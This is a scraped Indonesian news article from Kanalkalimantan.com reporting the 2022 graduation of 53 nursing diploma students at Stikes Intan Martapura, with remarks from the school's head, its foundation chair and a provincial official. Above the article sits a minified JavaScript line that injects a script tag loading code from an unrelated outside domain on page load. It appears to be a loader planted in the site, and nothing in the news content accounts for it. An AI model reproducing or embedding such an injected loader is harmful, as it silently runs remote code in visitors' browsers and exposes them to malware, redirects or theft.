(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
kampus

Stikes Intan Martapura Wisuda Angkatan III 53 Mahasiwa DIII Keperawatan


KANALKALIMANTAN.COM, BANJARBARU – Sekolah Tinggi Ilmu Kesehatan (Stikes) Intan Martapura menggelar wisuda Program Studi (Prodi) Diploma III Keperawatan Angkatan III dalam sidang senat terbuka di Ballroom Grand Dafam Q Hotel, Banjarbaru, Selasa (23/8/2022).

Pada wisuda Angkatan III, Stikes Intan Martapura meluluskan sebanyak 53 wisudawan Prodi DIII Keperawatan.

Ketua Stikes Intan Martapura, Hj Zubaidah mengatakan, 53 mahasiswa yang di wisuda hari ini dari Prodi DIII Keperawatan tahun akademik 2021/2022.

“Acara wisuda adalah peristiwa penting untuk menandai batas antara tahap kehidupan belajar di kampus dengan status sebagai mahasiswa, dan tahapan kehidupan pengamalan ilmu di dunia kerja dan masyarakat dengan status sebagai lulusan Stikes Intan Martapura,” ujarnya.

 

Baca juga  : Tim Kemenkes ke RSD Idaman Banjarbaru Penguatan Penerapan K3 

Jika mereka bertugas sebagai perawat, dia bisa memberikan keterampilan dan ilmunya kepada pasien, sehingga tidak ada kesan perawat menelantarkan pasien.

“Kita harapkan mereka bisa bertugas di daerah-daerah, terutama di daerah terpencil yang masih kurang pelayanan kesehatannya, yang penting mau tulus ikhlas bertugas di desa,” harapnya.

Dibeberkan Hj Zubaidah dalam pendidikan di Stikes Intan Martapura sangat didukung oleh Pemerintah Provinsi (Pemprov) Kalimantan Selatan (Kalsel) baik hibah bangunan maupun tanah.

Teranyar Stikes Intan Martapura mendapatkan hibah dari pemerintah di kawasan Indrasari, direncanakan sebagai perluasan wilayah pendidikan dan dari sekolah tinggi menjadi universitas.

 

Baca juga  : Kabupaten Banjar Ikuti Rakor Terpadu Penurunan Stunting

Sarana prasarana di dunia pendidikan kesehatan haruslah komplit. Sehingga dirinya berharap Pemprov Kalsel dan Pemkab Banjar dapat menyokong pendidikan Stikes Intan Martapura.

“Hal ini tidak boleh lepas dari perhatian pemerintah daerah untuk mendapatkan SDM yang profesional,” pungkasnya.

Sementara itu, Ketua Yayasan Banjar Insan Prestasi, Dr Taufik Arbain mengucapkan selamat dan terima kasih kepada pengurus, dan pengawas yayasan.

Juga kepada tenaga pendidik dan tenaga kependidikan, atas pengabdiannya selama ini. Sehingga mampu menghasilkan lulusan di bidang keperawatan yang berkualitas dan professional.

 

Baca juga  : Kantor Pertanahan HSU Janji Perbaiki Pelayanan 

Tak lupa dirinya juga berterima kasih kepada Pemprov Kalsel yang memberikan hibah selama tiga tahun berturut-turut.

“Pada hibah tahun 2022 ini bisa membangun bangunan serbaguna,” ujarnya.

Menurut Taufik Arbain peran Pemprov Kalsel dan Pemkab Banjar sangat berharga bagi pihaknya. Terutama bantuan hibah infrastruktur yang memudahkan pihaknya untuk memberikan pelayanan pendidikan.

“Aspek-aspek kesehatan di Kalsel ini perlu didukung penuh salah satunya dukungan kami menghasilkan dan mencetak sarjana kesehatan untuk mengisi ruang kekosongan di bidang kesehatan yang perlu dibenahi bersama,” tuturnya.

 

Baca juga  : 21 Parpol Terdaftar di Banjarbaru, KPU Banjarbaru Tahapan Verifikasi Administrasi

Ditempat yang sama, Gubernur Kalsel melalui Staf Ahli Bidang Kemasyarakat dan SDM Pemprov Kalsel Husnul Hatimah mengatakan dengan adanya wisuda angkatan III ini bisa membantu pemerintah daerah dalam mengembangkan sumber daya manusia di bidang pelayanan kesehatan.

“Wisuda ini dapat membantu pemerintah dalam mengembangkan SDM dibidang pelayanan kesehatan, memberikan kesejahteraan dan mencapai tingkat kesehatan yang lebih baik lagi,” ujarnya.

Dikatakan Husnul Hatimah, bentuk dukungan dari Pemprov Kalsel salah satunya pembangunan gedung yang sedang dibangun untuk lebih mengembangkan keberadaan Stikes Intan Martapura.

Wisudawan dengan indek prestasi kumulatif tertinggi peringkat pertama, IPK 3,71 diraih Lilly Nadya Safitri.(Kanalkalimantan.com/ibnu)

Reporter : ibnu
Editor : bie


Desy Arfianty

Recent Posts

Soal Pungutan Acara Perpisahan Siswa, Ini Kata Ketua DPRD Banjarbaru

KANALKALIMANTAN.COM, BANJARBARU - Dewan Perwakilan Rakyat Daerah (DPRD) Kota Banjarbaru menyikapi persoalan iuran kegiatan acara… Read More

2 jam ago

Pungutan Acara Perpisahaan Siswa, Begini Respon Wali Kota Aditya

KANALKALIMANTAN.COM, BANJARBARU – Menyikapi pungutan acara perpisahan siswa sekolah di Banjarbaru, Wali Kota Banjarbaru Aditya… Read More

3 jam ago

Orangtua Pusing, ‘Bermewah-mewahan’ Perpisahan Anak Sekolah di Banjarbaru

Kadisdik: Silakan Perpisahan di Sekolah dan Dilakukan dengan Sederhana Read More

14 jam ago

Bappedalitbang Banjar Gelar Rapat Pembahasan Data Indikator Makro Pembangunan RPJPD

KANALKALIMANTAN.COM, MARTAPURA – Badan Perencanaan Pembangunan Daerah, Penelitian dan Pengembangan (Bappedalitbang) Kabupaten Banjar melaksanakan rapat Pembahasan… Read More

14 jam ago

Pergantian Perwira di Polres Banjarmasin, Ini Nama dan Jabatannya

KANALKALIMANTAN.COM, BANJARMASIN - Sejumlah perwira menengah (Pamen) dan perwira pertama (Pama) di lingkungan Kepolisian Resor… Read More

14 jam ago

O2SN dan FLS2N 2024 SD MI Tingkat Kabupaten Kapuas Digelar

KANALKALIMANTAN.COM, KUALA KAPUAS - Ratusan pelajar tingkat SD/MI di Kabupaten Kapuas antusias mengikuti upacara pembukaan… Read More

15 jam ago

This website uses cookies.